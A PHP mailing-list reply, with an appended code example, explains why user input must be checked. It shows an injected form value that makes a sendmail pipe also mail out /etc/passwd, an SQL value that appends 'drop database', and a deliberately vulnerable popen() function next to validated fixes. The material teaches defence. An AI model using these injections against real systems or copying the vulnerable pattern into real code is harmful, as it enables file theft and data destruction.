> > 2. Please enter your age: 25; drop database mysql
> >
> > Does this actually work?
> [...]
> > So I decided I had to test this: I wrote the code exactly as in the
> > example; I provided the exact dangerous input (well, to be honest, I
> > tried a select instead of drop mysql). When I tried it, the presumably
> > dangerous situation degraded into a trivial MySQL error. It went
> > something like "You have an error near '; select 1+1'".
>
> I've done something similar in the past just for kicks, and I got the same
> result you did (i.e. an error). I believe this is because mysql_query()
> expects ONE query at a time and will break if you send two or more. I
> could be completely and totally wrong about that, though (someone please
> correct me if I am)...
Maybe this one failed, but it's always a good idea to check user input.

Let's say you're emailing a form and you don't use the mail() function,
but make a call directly to sendmail... and you're sloppy... so you do
this:

    $fp = popen("/usr/bin/sendmail $sendto", "w");
    # write stuff to pipe to send email...

Now... what if when I filled out the form I set $sendto equal to this:

    [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd

Your form will still work, but I'll also get your password file...

This used to happen *a lot* back in the early CGI days... This is why
they recommend checking all user input and initializing variables...

-philip

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
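Added example, not code from anyone in this thread: the sloppy sendmail pipe Philip describes next to a checked version, plus the "enter your age" query from the quoted exchange done with a bound parameter instead of relying on mysql_query() rejecting a second statement. The function names, the `people` table and the form field names are assumptions made for the example.

```php
<?php
// Added example (not from the thread). Two form values are handled:
// $sendto for the sendmail pipe, and $age for the "enter your age" query.

// --- 1. The sloppy pipe: $sendto is pasted straight into a shell command. ---
// popen() hands the whole string to /bin/sh -c, so anything the shell treats
// as a separator inside $sendto becomes a second command.
function send_sloppy(string $sendto, string $body): void {
    $fp = popen("/usr/bin/sendmail $sendto", "w");   // VULNERABLE
    fwrite($fp, $body);
    pclose($fp);
}

// --- 2. Checked: validate first, reject on failure, and never build a shell
// string from user data. proc_open() with an argument array (PHP >= 7.4)
// executes sendmail directly with no shell in between. ---
function send_checked(string $sendto, string $body): bool {
    // Whitelist: only a syntactically valid address gets near sendmail.
    if (filter_var($sendto, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // A valid address may still start with '-', which sendmail would read as
    // an option rather than a recipient, so reject that shape as well.
    if ($sendto[0] === '-') {
        return false;
    }
    // Argument-array form: each element is one argv entry, nothing is parsed
    // by a shell. (Using mail() instead avoids the pipe altogether.)
    $proc = proc_open(['/usr/bin/sendmail', '-i', $sendto],
                      [0 => ['pipe', 'r']], $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fwrite($pipes[0], $body);
    fclose($pipes[0]);
    return proc_close($proc) === 0;
}

// --- 3. The SQL side: mysql_query() refusing a second statement is a property
// of that one API call, not input validation. Check the shape of the value and
// bind it, so the input is only ever data, never part of the statement text. ---
function store_age(PDO $db, string $age): bool {
    if (!ctype_digit($age) || (int)$age > 150) {   // whitelist digits only
        return false;
    }
    $stmt = $db->prepare('INSERT INTO people (age) VALUES (:age)');
    return $stmt->execute([':age' => (int)$age]);
}
```

With the bound parameter, "25; drop database mysql" fails the ctype_digit() check before any SQL is built; even without that check it would reach the server as a string value, not as a second statement.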